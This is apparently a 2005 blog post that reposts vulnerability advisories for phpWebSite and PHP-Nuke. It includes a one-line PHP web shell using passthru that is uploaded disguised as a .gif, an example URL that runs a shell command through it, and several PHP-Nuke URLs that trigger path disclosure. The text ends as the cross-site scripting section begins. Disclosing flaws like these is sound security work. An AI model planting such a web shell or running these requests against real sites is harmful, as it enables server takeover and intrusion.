Sunday, March 06, 2005
PHP include in phpWebSite
Summary:
Anyone, who has permissions to add announces, can upload php-script asa .gif file and execute it.
Example:
http://[target]/images/announce/[anyname].gif.php?nst=ls –la
Where [anyname].gif.php - php-script with this line:
passthru($_GET[nst]);
Vulnerable Systems:Official Website: phpWebSitephpWebSite <= 0.10.0
Multiple Vulnerabilities in PHP-Nuke (db.php, index.php, Downloads, Web_Links)
Multiple Vulnerabilities in PHP-Nuke (db.php, index.php, Downloads, Web_Links)
Summary
Php-Nuke is "a popular open source content management system, written in PHP by Francisco Burzi. This CMS is used on many thousands websites, because it's freeware, easy to install and manage and has broad set of features".Multiple vulnerabilities were found in PHP-Nuke that result in Path Disclosure and Cross Site Scripting.
Credit:
The information has been provided by Janek Vind.The original article can be found at: waraxe.us
Details
Vulnerable Systems:
* PHP-Nuke version 6.0 up to version 7.6Path
Disclosure:
There are several path disclosure in PHP-Nuke when any of the following sample URLs are accessed:
http://localhost/nuke75/db/db.php
http://localhost/nuke75/index.php?inside_mod=1
http://localhost/nuke75/modules.php?name=Downloads&d_op=menu
http://localhost/nuke75/modules.php?name=Web_Links&l_op=menu
Cross Site Scripting
There are two parameters in the modules.php file that are vulnerable to Cross Site Scripting attacks: